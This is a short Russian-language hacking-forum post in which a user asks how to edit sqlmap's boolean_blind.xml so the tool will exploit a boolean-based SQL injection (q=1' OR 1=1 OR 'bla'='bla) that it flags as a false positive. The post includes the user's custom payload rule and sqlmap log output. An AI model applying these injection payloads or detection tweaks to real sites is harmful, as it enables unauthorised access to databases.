31.05.2019, 13:56
|
|
Новичок
Регистрация: 19.06.2018
Сообщений: 6
С нами:
4159766
Репутация:
0
|
|
Есть boolean based такого формата x.php?q=1' OR 1=1 OR 'bla'='bla
Но мап ее не видит, подозреваю из-за OR OR
Думаю, что надо подправить boolean_blind.xml, верно? кто может помочь правильно составить правило?
upd
изменил, теперь видит иньекцию, но говорит что false-positive, как это исправить?
OR boolean-based blind - WHERE or HAVING clause
1
1
1
1,9
2
OR [INFERENCE]
%27OR 1=1 OR %273%27=%273
%27OR 1=2 OR %273%27=%273
[03:55:45] [INFO] GET parameter 'q' appears to be 'OR boolean-based blind - WHER
E or HAVING clause' injectable
[03:55:51] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[03:56:05] [WARNING] in OR boolean-based injection cases, please consider usage
of switch '--drop-set-cookie' if you experience any problems during data retriev
al
[03:56:05] [INFO] checking if the injection point on GET parameter 'q' is a fals
e positive
[03:56:05] [WARNING] false positive or unexploitable injection point detected
[03:56:05] [WARNING] GET parameter 'q' does not seem to be injectable
|
|
|